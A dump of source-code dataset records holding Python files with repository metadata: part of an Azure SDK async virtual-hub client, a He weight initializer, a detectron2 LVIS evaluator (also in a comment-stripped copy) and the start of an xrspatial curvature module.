list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs'}
def list(
self,
**kwargs
) -> AsyncIterable["_models.ListVirtualHubsResult"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualHubs'}
async def _get_effective_virtual_hub_routes_initial(
self,
resource_group_name: str,
virtual_hub_name: str,
effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
**kwargs
) -> None:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
url = self._get_effective_virtual_hub_routes_initial.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {}
if effective_routes_parameters is not None:
body_content = self._serialize.body(effective_routes_parameters, 'EffectiveRoutesParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_get_effective_virtual_hub_routes_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'}
async def begin_get_effective_virtual_hub_routes(
self,
resource_group_name: str,
virtual_hub_name: str,
effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
**kwargs
) -> AsyncLROPoller[None]:
polling = kwargs.pop('polling', True)
cls = kwargs.pop('cls', None)
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None)
if cont_token is None:
raw_result = await self._get_effective_virtual_hub_routes_initial(
resource_group_name=resource_group_name,
virtual_hub_name=virtual_hub_name,
effective_routes_parameters=effective_routes_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_virtual_hub_routes.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'}
| true | true |
1c305ddb001f13daeb09fafa14c1e6e04627c7cf | 484 | py | Python | nnfs/initializers/he.py | akshaykurmi/neural-networks-from-scratch | 54d62d9f5adb102d14267a922a515fa79bf52bd6 | [
"MIT"
] | 2 | 2019-09-13T22:31:21.000Z | 2020-11-28T18:51:14.000Z | nnfs/initializers/he.py | akshaykurmi/neural-networks-from-scratch | 54d62d9f5adb102d14267a922a515fa79bf52bd6 | [
"MIT"
] | null | null | null | nnfs/initializers/he.py | akshaykurmi/neural-networks-from-scratch | 54d62d9f5adb102d14267a922a515fa79bf52bd6 | [
"MIT"
] | null | null | null | import numpy as np
class HeUniform:
@staticmethod
def initialize(shape):
fan_in = shape[0] if len(shape) == 2 else shape[1] * np.prod(shape[2:])
scale = np.sqrt(6.0 / fan_in)
return np.random.uniform(-scale, scale, shape)
class HeNormal:
@staticmethod
def initialize(shape):
fan_in = shape[0] if len(shape) == 2 else shape[1] * np.prod(shape[2:])
scale = np.sqrt(2.0 / fan_in)
return np.random.randn(*shape) * scale
| 26.888889 | 79 | 0.609504 | import numpy as np
class HeUniform:
@staticmethod
def initialize(shape):
fan_in = shape[0] if len(shape) == 2 else shape[1] * np.prod(shape[2:])
scale = np.sqrt(6.0 / fan_in)
return np.random.uniform(-scale, scale, shape)
class HeNormal:
@staticmethod
def initialize(shape):
fan_in = shape[0] if len(shape) == 2 else shape[1] * np.prod(shape[2:])
scale = np.sqrt(2.0 / fan_in)
return np.random.randn(*shape) * scale
| true | true |
1c305e22ccc0b03111e13cb76675f569b49a53b8 | 13,509 | py | Python | detectron2_repo/evaluation/lvis_evaluation.py | JaninaMattes/detectron2_dla | da9b0925eb280a208e7837986f7cf79779d3ca61 | [
"Apache-2.0"
] | null | null | null | detectron2_repo/evaluation/lvis_evaluation.py | JaninaMattes/detectron2_dla | da9b0925eb280a208e7837986f7cf79779d3ca61 | [
"Apache-2.0"
] | null | null | null | detectron2_repo/evaluation/lvis_evaluation.py | JaninaMattes/detectron2_dla | da9b0925eb280a208e7837986f7cf79779d3ca61 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import copy
import itertools
import json
import logging
import os
import pickle
from collections import OrderedDict
import torch
from fvcore.common.file_io import PathManager
import detectron2.utils.comm as comm
from detectron2.data import MetadataCatalog
from detectron2.structures import Boxes, BoxMode, pairwise_iou
from detectron2.utils.logger import create_small_table
from .coco_evaluation import instances_to_coco_json
from .evaluator import DatasetEvaluator
class LVISEvaluator(DatasetEvaluator):
"""
Evaluate object proposal and instance detection/segmentation outputs using
LVIS's metrics and evaluation API.
"""
def __init__(self, dataset_name, cfg, distributed, output_dir=None):
"""
Args:
dataset_name (str): name of the dataset to be evaluated.
It must have the following corresponding metadata:
"json_file": the path to the LVIS format annotation
cfg (CfgNode): config instance
distributed (True): if True, will collect results from all ranks for evaluation.
Otherwise, will evaluate the results in the current process.
output_dir (str): optional, an output directory to dump results.
"""
from lvis import LVIS
self._tasks = self._tasks_from_config(cfg)
self._distributed = distributed
self._output_dir = output_dir
self._cpu_device = torch.device("cpu")
self._logger = logging.getLogger(__name__)
self._metadata = MetadataCatalog.get(dataset_name)
json_file = PathManager.get_local_path(self._metadata.json_file)
self._lvis_api = LVIS(json_file)
# Test set json files do not contain annotations (evaluation must be
# performed using the LVIS evaluation server).
self._do_evaluation = len(self._lvis_api.get_ann_ids()) > 0
def reset(self):
self._predictions = []
self._lvis_results = []
def _tasks_from_config(self, cfg):
"""
Returns:
tuple[str]: tasks that can be evaluated under the given configuration.
"""
tasks = ("bbox",)
if cfg.MODEL.MASK_ON:
tasks = tasks + ("segm",)
return tasks
def process(self, inputs, outputs):
"""
Args:
inputs: the inputs to a LVIS model (e.g., GeneralizedRCNN).
It is a list of dict. Each dict corresponds to an image and
contains keys like "height", "width", "file_name", "image_id".
outputs: the outputs of a LVIS model. It is a list of dicts with key
"instances" that contains :class:`Instances`.
"""
for input, output in zip(inputs, outputs):
prediction = {"image_id": input["image_id"]}
if "instances" in output:
instances = output["instances"].to(self._cpu_device)
prediction["instances"] = instances_to_coco_json(instances, input["image_id"])
if "proposals" in output:
prediction["proposals"] = output["proposals"].to(self._cpu_device)
self._predictions.append(prediction)
def evaluate(self):
if self._distributed:
comm.synchronize()
self._predictions = comm.gather(self._predictions, dst=0)
self._predictions = list(itertools.chain(*self._predictions))
if not comm.is_main_process():
return
if len(self._predictions) == 0:
self._logger.warning("[LVISEvaluator] Did not receive valid predictions.")
return {}
if self._output_dir:
PathManager.mkdirs(self._output_dir)
file_path = os.path.join(self._output_dir, "instances_predictions.pth")
with PathManager.open(file_path, "wb") as f:
torch.save(self._predictions, f)
self._results = OrderedDict()
if "proposals" in self._predictions[0]:
self._eval_box_proposals()
if "instances" in self._predictions[0]:
self._eval_predictions(set(self._tasks))
# Copy so the caller can do whatever with results
return copy.deepcopy(self._results)
def _eval_predictions(self, tasks):
"""
Evaluate self._predictions on the given tasks.
Fill self._results with the metrics of the tasks.
"""
self._logger.info("Preparing results in the LVIS format ...")
self._lvis_results = list(itertools.chain(*[x["instances"] for x in self._predictions]))
# unmap the category ids for LVIS (from 0-indexed to 1-indexed)
for result in self._lvis_results:
result["category_id"] += 1
if self._output_dir:
file_path = os.path.join(self._output_dir, "lvis_instances_results.json")
self._logger.info("Saving results to {}".format(file_path))
with PathManager.open(file_path, "w") as f:
f.write(json.dumps(self._lvis_results))
f.flush()
if not self._do_evaluation:
self._logger.info("Annotations are not available for evaluation.")
return
self._logger.info("Evaluating predictions ...")
for task in sorted(tasks):
res = _evaluate_predictions_on_lvis(
self._lvis_api,
self._lvis_results,
task,
class_names=self._metadata.get("thing_classes"),
)
self._results[task] = res
def _eval_box_proposals(self):
"""
Evaluate the box proposals in self._predictions.
Fill self._results with the metrics for "box_proposals" task.
"""
if self._output_dir:
# Saving generated box proposals to file.
# Predicted box_proposals are in XYXY_ABS mode.
bbox_mode = BoxMode.XYXY_ABS.value
ids, boxes, objectness_logits = [], [], []
for prediction in self._predictions:
ids.append(prediction["image_id"])
boxes.append(prediction["proposals"].proposal_boxes.tensor.numpy())
objectness_logits.append(prediction["proposals"].objectness_logits.numpy())
proposal_data = {
"boxes": boxes,
"objectness_logits": objectness_logits,
"ids": ids,
"bbox_mode": bbox_mode,
}
with PathManager.open(os.path.join(self._output_dir, "box_proposals.pkl"), "wb") as f:
pickle.dump(proposal_data, f)
if not self._do_evaluation:
self._logger.info("Annotations are not available for evaluation.")
return
self._logger.info("Evaluating bbox proposals ...")
res = {}
areas = {"all": "", "small": "s", "medium": "m", "large": "l"}
for limit in [100, 1000]:
for area, suffix in areas.items():
stats = _evaluate_box_proposals(
self._predictions, self._lvis_api, area=area, limit=limit
)
key = "AR{}@{:d}".format(suffix, limit)
res[key] = float(stats["ar"].item() * 100)
self._logger.info("Proposal metrics: \n" + create_small_table(res))
self._results["box_proposals"] = res
# inspired from Detectron:
# https://github.com/facebookresearch/Detectron/blob/a6a835f5b8208c45d0dce217ce9bbda915f44df7/detectron/datasets/json_dataset_evaluator.py#L255 # noqa
def _evaluate_box_proposals(dataset_predictions, lvis_api, thresholds=None, area="all", limit=None):
"""
Evaluate detection proposal recall metrics. This function is a much
faster alternative to the official LVIS API recall evaluation code. However,
it produces slightly different results.
"""
# Record max overlap value for each gt box
# Return vector of overlap values
areas = {
"all": 0,
"small": 1,
"medium": 2,
"large": 3,
"96-128": 4,
"128-256": 5,
"256-512": 6,
"512-inf": 7,
}
area_ranges = [
[0 ** 2, 1e5 ** 2], # all
[0 ** 2, 32 ** 2], # small
[32 ** 2, 96 ** 2], # medium
[96 ** 2, 1e5 ** 2], # large
[96 ** 2, 128 ** 2], # 96-128
[128 ** 2, 256 ** 2], # 128-256
[256 ** 2, 512 ** 2], # 256-512
[512 ** 2, 1e5 ** 2],
] # 512-inf
assert area in areas, "Unknown area range: {}".format(area)
area_range = area_ranges[areas[area]]
gt_overlaps = []
num_pos = 0
for prediction_dict in dataset_predictions:
predictions = prediction_dict["proposals"]
# sort predictions in descending order
# TODO maybe remove this and make it explicit in the documentation
inds = predictions.objectness_logits.sort(descending=True)[1]
predictions = predictions[inds]
ann_ids = lvis_api.get_ann_ids(img_ids=[prediction_dict["image_id"]])
anno = lvis_api.load_anns(ann_ids)
gt_boxes = [
BoxMode.convert(obj["bbox"], BoxMode.XYWH_ABS, BoxMode.XYXY_ABS) for obj in anno
]
gt_boxes = torch.as_tensor(gt_boxes).reshape(-1, 4) # guard against no boxes
gt_boxes = Boxes(gt_boxes)
gt_areas = torch.as_tensor([obj["area"] for obj in anno])
if len(gt_boxes) == 0 or len(predictions) == 0:
continue
valid_gt_inds = (gt_areas >= area_range[0]) & (gt_areas <= area_range[1])
gt_boxes = gt_boxes[valid_gt_inds]
num_pos += len(gt_boxes)
if len(gt_boxes) == 0:
continue
if limit is not None and len(predictions) > limit:
predictions = predictions[:limit]
overlaps = pairwise_iou(predictions.proposal_boxes, gt_boxes)
_gt_overlaps = torch.zeros(len(gt_boxes))
for j in range(min(len(predictions), len(gt_boxes))):
# find which proposal box maximally covers each gt box
# and get the iou amount of coverage for each gt box
max_overlaps, argmax_overlaps = overlaps.max(dim=0)
# find which gt box is 'best' covered (i.e. 'best' = most iou)
gt_ovr, gt_ind = max_overlaps.max(dim=0)
assert gt_ovr >= 0
# find the proposal box that covers the best covered gt box
box_ind = argmax_overlaps[gt_ind]
# record the iou coverage of this gt box
_gt_overlaps[j] = overlaps[box_ind, gt_ind]
assert _gt_overlaps[j] == gt_ovr
# mark the proposal box and the gt box as used
overlaps[box_ind, :] = -1
overlaps[:, gt_ind] = -1
# append recorded iou coverage level
gt_overlaps.append(_gt_overlaps)
gt_overlaps = torch.cat(gt_overlaps, dim=0)
gt_overlaps, _ = torch.sort(gt_overlaps)
if thresholds is None:
step = 0.05
thresholds = torch.arange(0.5, 0.95 + 1e-5, step, dtype=torch.float32)
recalls = torch.zeros_like(thresholds)
# compute recall for each iou threshold
for i, t in enumerate(thresholds):
recalls[i] = (gt_overlaps >= t).float().sum() / float(num_pos)
# ar = 2 * np.trapz(recalls, thresholds)
ar = recalls.mean()
return {
"ar": ar,
"recalls": recalls,
"thresholds": thresholds,
"gt_overlaps": gt_overlaps,
"num_pos": num_pos,
}
def _evaluate_predictions_on_lvis(lvis_gt, lvis_results, iou_type, class_names=None):
"""
Args:
iou_type (str):
kpt_oks_sigmas (list[float]):
class_names (None or list[str]): if provided, will use it to predict
per-category AP.
Returns:
a dict of {metric name: score}
"""
metrics = {
"bbox": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
"segm": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
}[iou_type]
logger = logging.getLogger(__name__)
if len(lvis_results) == 0: # TODO: check if needed
logger.warn("No predictions from the model! Set scores to -1")
return {metric: -1 for metric in metrics}
if iou_type == "segm":
lvis_results = copy.deepcopy(lvis_results)
# When evaluating mask AP, if the results contain bbox, LVIS API will
# use the box area as the area of the instance, instead of the mask area.
# This leads to a different definition of small/medium/large.
# We remove the bbox field to let mask AP use mask area.
for c in lvis_results:
c.pop("bbox", None)
from lvis import LVISEval, LVISResults
lvis_results = LVISResults(lvis_gt, lvis_results)
lvis_eval = LVISEval(lvis_gt, lvis_results, iou_type)
lvis_eval.run()
lvis_eval.print_results()
# Pull the standard metrics from the LVIS results
results = lvis_eval.get_results()
results = {metric: float(results[metric] * 100) for metric in metrics}
logger.info("Evaluation results for {}: \n".format(iou_type) + create_small_table(results))
return results
| 39.615836 | 151 | 0.596343 |
import copy
import itertools
import json
import logging
import os
import pickle
from collections import OrderedDict
import torch
from fvcore.common.file_io import PathManager
import detectron2.utils.comm as comm
from detectron2.data import MetadataCatalog
from detectron2.structures import Boxes, BoxMode, pairwise_iou
from detectron2.utils.logger import create_small_table
from .coco_evaluation import instances_to_coco_json
from .evaluator import DatasetEvaluator
class LVISEvaluator(DatasetEvaluator):
def __init__(self, dataset_name, cfg, distributed, output_dir=None):
from lvis import LVIS
self._tasks = self._tasks_from_config(cfg)
self._distributed = distributed
self._output_dir = output_dir
self._cpu_device = torch.device("cpu")
self._logger = logging.getLogger(__name__)
self._metadata = MetadataCatalog.get(dataset_name)
json_file = PathManager.get_local_path(self._metadata.json_file)
self._lvis_api = LVIS(json_file)
self._do_evaluation = len(self._lvis_api.get_ann_ids()) > 0
def reset(self):
self._predictions = []
self._lvis_results = []
def _tasks_from_config(self, cfg):
tasks = ("bbox",)
if cfg.MODEL.MASK_ON:
tasks = tasks + ("segm",)
return tasks
def process(self, inputs, outputs):
for input, output in zip(inputs, outputs):
prediction = {"image_id": input["image_id"]}
if "instances" in output:
instances = output["instances"].to(self._cpu_device)
prediction["instances"] = instances_to_coco_json(instances, input["image_id"])
if "proposals" in output:
prediction["proposals"] = output["proposals"].to(self._cpu_device)
self._predictions.append(prediction)
def evaluate(self):
if self._distributed:
comm.synchronize()
self._predictions = comm.gather(self._predictions, dst=0)
self._predictions = list(itertools.chain(*self._predictions))
if not comm.is_main_process():
return
if len(self._predictions) == 0:
self._logger.warning("[LVISEvaluator] Did not receive valid predictions.")
return {}
if self._output_dir:
PathManager.mkdirs(self._output_dir)
file_path = os.path.join(self._output_dir, "instances_predictions.pth")
with PathManager.open(file_path, "wb") as f:
torch.save(self._predictions, f)
self._results = OrderedDict()
if "proposals" in self._predictions[0]:
self._eval_box_proposals()
if "instances" in self._predictions[0]:
self._eval_predictions(set(self._tasks))
return copy.deepcopy(self._results)
def _eval_predictions(self, tasks):
self._logger.info("Preparing results in the LVIS format ...")
self._lvis_results = list(itertools.chain(*[x["instances"] for x in self._predictions]))
for result in self._lvis_results:
result["category_id"] += 1
if self._output_dir:
file_path = os.path.join(self._output_dir, "lvis_instances_results.json")
self._logger.info("Saving results to {}".format(file_path))
with PathManager.open(file_path, "w") as f:
f.write(json.dumps(self._lvis_results))
f.flush()
if not self._do_evaluation:
self._logger.info("Annotations are not available for evaluation.")
return
self._logger.info("Evaluating predictions ...")
for task in sorted(tasks):
res = _evaluate_predictions_on_lvis(
self._lvis_api,
self._lvis_results,
task,
class_names=self._metadata.get("thing_classes"),
)
self._results[task] = res
def _eval_box_proposals(self):
if self._output_dir:
bbox_mode = BoxMode.XYXY_ABS.value
ids, boxes, objectness_logits = [], [], []
for prediction in self._predictions:
ids.append(prediction["image_id"])
boxes.append(prediction["proposals"].proposal_boxes.tensor.numpy())
objectness_logits.append(prediction["proposals"].objectness_logits.numpy())
proposal_data = {
"boxes": boxes,
"objectness_logits": objectness_logits,
"ids": ids,
"bbox_mode": bbox_mode,
}
with PathManager.open(os.path.join(self._output_dir, "box_proposals.pkl"), "wb") as f:
pickle.dump(proposal_data, f)
if not self._do_evaluation:
self._logger.info("Annotations are not available for evaluation.")
return
self._logger.info("Evaluating bbox proposals ...")
res = {}
areas = {"all": "", "small": "s", "medium": "m", "large": "l"}
for limit in [100, 1000]:
for area, suffix in areas.items():
stats = _evaluate_box_proposals(
self._predictions, self._lvis_api, area=area, limit=limit
)
key = "AR{}@{:d}".format(suffix, limit)
res[key] = float(stats["ar"].item() * 100)
self._logger.info("Proposal metrics: \n" + create_small_table(res))
self._results["box_proposals"] = res
roposals(dataset_predictions, lvis_api, thresholds=None, area="all", limit=None):
areas = {
"all": 0,
"small": 1,
"medium": 2,
"large": 3,
"96-128": 4,
"128-256": 5,
"256-512": 6,
"512-inf": 7,
}
area_ranges = [
[0 ** 2, 1e5 ** 2],
[0 ** 2, 32 ** 2],
[32 ** 2, 96 ** 2],
[96 ** 2, 1e5 ** 2],
[96 ** 2, 128 ** 2],
[128 ** 2, 256 ** 2],
[256 ** 2, 512 ** 2],
[512 ** 2, 1e5 ** 2],
]
assert area in areas, "Unknown area range: {}".format(area)
area_range = area_ranges[areas[area]]
gt_overlaps = []
num_pos = 0
for prediction_dict in dataset_predictions:
predictions = prediction_dict["proposals"]
inds = predictions.objectness_logits.sort(descending=True)[1]
predictions = predictions[inds]
ann_ids = lvis_api.get_ann_ids(img_ids=[prediction_dict["image_id"]])
anno = lvis_api.load_anns(ann_ids)
gt_boxes = [
BoxMode.convert(obj["bbox"], BoxMode.XYWH_ABS, BoxMode.XYXY_ABS) for obj in anno
]
gt_boxes = torch.as_tensor(gt_boxes).reshape(-1, 4)
gt_boxes = Boxes(gt_boxes)
gt_areas = torch.as_tensor([obj["area"] for obj in anno])
if len(gt_boxes) == 0 or len(predictions) == 0:
continue
valid_gt_inds = (gt_areas >= area_range[0]) & (gt_areas <= area_range[1])
gt_boxes = gt_boxes[valid_gt_inds]
num_pos += len(gt_boxes)
if len(gt_boxes) == 0:
continue
if limit is not None and len(predictions) > limit:
predictions = predictions[:limit]
overlaps = pairwise_iou(predictions.proposal_boxes, gt_boxes)
_gt_overlaps = torch.zeros(len(gt_boxes))
for j in range(min(len(predictions), len(gt_boxes))):
max_overlaps, argmax_overlaps = overlaps.max(dim=0)
gt_ovr, gt_ind = max_overlaps.max(dim=0)
assert gt_ovr >= 0
box_ind = argmax_overlaps[gt_ind]
_gt_overlaps[j] = overlaps[box_ind, gt_ind]
assert _gt_overlaps[j] == gt_ovr
overlaps[box_ind, :] = -1
overlaps[:, gt_ind] = -1
gt_overlaps.append(_gt_overlaps)
gt_overlaps = torch.cat(gt_overlaps, dim=0)
gt_overlaps, _ = torch.sort(gt_overlaps)
if thresholds is None:
step = 0.05
thresholds = torch.arange(0.5, 0.95 + 1e-5, step, dtype=torch.float32)
recalls = torch.zeros_like(thresholds)
for i, t in enumerate(thresholds):
recalls[i] = (gt_overlaps >= t).float().sum() / float(num_pos)
ar = recalls.mean()
return {
"ar": ar,
"recalls": recalls,
"thresholds": thresholds,
"gt_overlaps": gt_overlaps,
"num_pos": num_pos,
}
def _evaluate_predictions_on_lvis(lvis_gt, lvis_results, iou_type, class_names=None):
metrics = {
"bbox": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
"segm": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
}[iou_type]
logger = logging.getLogger(__name__)
if len(lvis_results) == 0:
logger.warn("No predictions from the model! Set scores to -1")
return {metric: -1 for metric in metrics}
if iou_type == "segm":
lvis_results = copy.deepcopy(lvis_results)
for c in lvis_results:
c.pop("bbox", None)
from lvis import LVISEval, LVISResults
lvis_results = LVISResults(lvis_gt, lvis_results)
lvis_eval = LVISEval(lvis_gt, lvis_results, iou_type)
lvis_eval.run()
lvis_eval.print_results()
results = lvis_eval.get_results()
results = {metric: float(results[metric] * 100) for metric in metrics}
logger.info("Evaluation results for {}: \n".format(iou_type) + create_small_table(results))
return results
| true | true |
1c305e7fe75eb05d9cde1edd8ef861a1997b68b6 | 7,486 | py | Python | xrspatial/curvature.py | brendancol/xarray-spatial | 36d53b75086b760cab5100a12fcbda946dd85a25 | [
"MIT"
] | null | null | null | xrspatial/curvature.py | brendancol/xarray-spatial | 36d53b75086b760cab5100a12fcbda946dd85a25 | [
"MIT"
] | null | null | null | xrspatial/curvature.py | brendancol/xarray-spatial | 36d53b75086b760cab5100a12fcbda946dd85a25 | [
"MIT"
] | null | null | null | # std lib
from functools import partial
from typing import Union
from typing import Optional
# 3rd-party
try:
import cupy
except ImportError:
class cupy(object):
ndarray = False
import dask.array as da
from numba import cuda
import numpy as np
import xarray as xr
# local modules
from xrspatial.utils import cuda_args
from xrspatial.utils import get_dataarray_resolution
from xrspatial.utils import ngjit
from xrspatial.utils import not_implemented_func
from xrspatial.utils import ArrayTypeFunctionMapping
@ngjit
def _cpu(data, cellsize):
out = np.empty(data.shape, np.float64)
out[:] = np.nan
rows, cols = data.shape
for y in range(1, rows - 1):
for x in range(1, cols - 1):
d = (data[y + 1, x] + data[y - 1, x]) / 2 - data[y, x]
e = (data[y, x + 1] + data[y, x - 1]) / 2 - data[y, x]
out[y, x] = -2 * (d + e) * 100 / (cellsize * cellsize)
return out
def _run_numpy(data: np.ndarray,
cellsize: Union[int, float]) -> np.ndarray:
# TODO: handle border edge effect
out = _cpu(data, cellsize)
return out
def _run_dask_numpy(data: da.Array,
cellsize: Union[int, float]) -> da.Array:
_func = partial(_cpu, cellsize=cellsize)
out = data.map_overlap(_func,
depth=(1, 1),
boundary=np.nan,
meta=np.array(()))
return out
@cuda.jit(device=True)
def _gpu(arr, cellsize):
d = (arr[1, 0] + arr[1, 2]) / 2 - arr[1, 1]
e = (arr[0, 1] + arr[2, 1]) / 2 - arr[1, 1]
curv = -2 * (d + e) * 100 / (cellsize[0] * cellsize[0])
return curv
@cuda.jit
def _run_gpu(arr, cellsize, out):
i, j = cuda.grid(2)
di = 1
dj = 1
if (i - di >= 0 and i + di <= out.shape[0] - 1 and
j - dj >= 0 and j + dj <= out.shape[1] - 1):
out[i, j] = _gpu(arr[i - di:i + di + 1, j - dj:j + dj + 1], cellsize)
def _run_cupy(data: cupy.ndarray,
cellsize: Union[int, float]) -> cupy.ndarray:
cellsize_arr = cupy.array([float(cellsize)], dtype='f4')
# TODO: add padding
griddim, blockdim = cuda_args(data.shape)
out = cupy.empty(data.shape, dtype='f4')
out[:] = cupy.nan
_run_gpu[griddim, blockdim](data, cellsize_arr, out)
return out
def curvature(agg: xr.DataArray,
name: Optional[str] = 'curvature') -> xr.DataArray:
"""
Calculates, for all cells in the array, the curvature (second
derivative) of each cell based on the elevation of its neighbors
in a 3x3 grid. A positive curvature indicates the surface is
upwardly convex. A negative value indicates it is upwardly
concave. A value of 0 indicates a flat surface.
Units of the curvature output raster are one hundredth (1/100)
of a z-unit.
Parameters
----------
agg : xarray.DataArray
2D NumPy, CuPy, NumPy-backed Dask xarray DataArray of elevation values.
Must contain `res` attribute.
name : str, default='curvature'
Name of output DataArray.
Returns
-------
curvature_agg : xarray.DataArray, of the same type as `agg`
2D aggregate array of curvature values.
All other input attributes are preserved.
References
----------
- arcgis: https://pro.arcgis.com/en/pro-app/latest/tool-reference/spatial-analyst/how-curvature-works.htm # noqa
Examples
--------
Curvature works with NumPy backed xarray DataArray
.. sourcecode:: python
>>> import numpy as np
>>> import xarray as xr
>>> from xrspatial import curvature
>>> flat_data = np.zeros((5, 5), dtype=np.float64)
>>> flat_raster = xr.DataArray(flat_data, attrs={'res': (1, 1)})
>>> flat_curv = curvature(flat_raster)
>>> print(flat_curv)
<xarray.DataArray 'curvature' (dim_0: 5, dim_1: 5)>
array([[nan, nan, nan, nan, nan],
[nan, -0., -0., -0., nan],
[nan, -0., -0., -0., nan],
[nan, -0., -0., -0., nan],
[nan, nan, nan, nan, nan]])
Dimensions without coordinates: dim_0, dim_1
Attributes:
res: (1, 1)
Curvature works with Dask with NumPy backed xarray DataArray
.. sourcecode:: python
>>> convex_data = np.array([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, -1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]], dtype=np.float64)
>>> convex_raster = xr.DataArray(
da.from_array(convex_data, chunks=(3, 3)),
attrs={'res': (10, 10)}, name='convex_dask_numpy_raster')
>>> print(convex_raster)
<xarray.DataArray 'convex_dask_numpy_raster' (dim_0: 5, dim_1: 5)>
dask.array<array, shape=(5, 5), dtype=float64, chunksize=(3, 3), chunktype=numpy.ndarray>
Dimensions without coordinates: dim_0, dim_1
Attributes:
res: (10, 10)
>>> convex_curv = curvature(convex_raster, name='convex_curvature')
>>> print(convex_curv) # return a xarray DataArray with Dask-backed array
<xarray.DataArray 'convex_curvature' (dim_0: 5, dim_1: 5)>
dask.array<_trim, shape=(5, 5), dtype=float64, chunksize=(3, 3), chunktype=numpy.ndarray>
Dimensions without coordinates: dim_0, dim_1
Attributes:
res: (10, 10)
>>> print(convex_curv.compute())
<xarray.DataArray 'convex_curvature' (dim_0: 5, dim_1: 5)>
array([[nan, nan, nan, nan, nan],
[nan, -0., 1., -0., nan],
[nan, 1., -4., 1., nan],
[nan, -0., 1., -0., nan],
[nan, nan, nan, nan, nan]])
Dimensions without coordinates: dim_0, dim_1
Attributes:
res: (10, 10)
Curvature works with CuPy backed xarray DataArray.
.. sourcecode:: python
>>> import cupy
>>> concave_data = np.array([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]], dtype=np.float64)
>>> concave_raster = xr.DataArray(
cupy.asarray(concave_data),
attrs={'res': (10, 10)}, name='concave_cupy_raster')
>>> concave_curv = curvature(concave_raster)
>>> print(type(concave_curv))
<class 'cupy.core.core.ndarray'>
>>> print(concave_curv)
<xarray.DataArray 'curvature' (dim_0: 5, dim_1: 5)>
array([[nan, nan, nan, nan, nan],
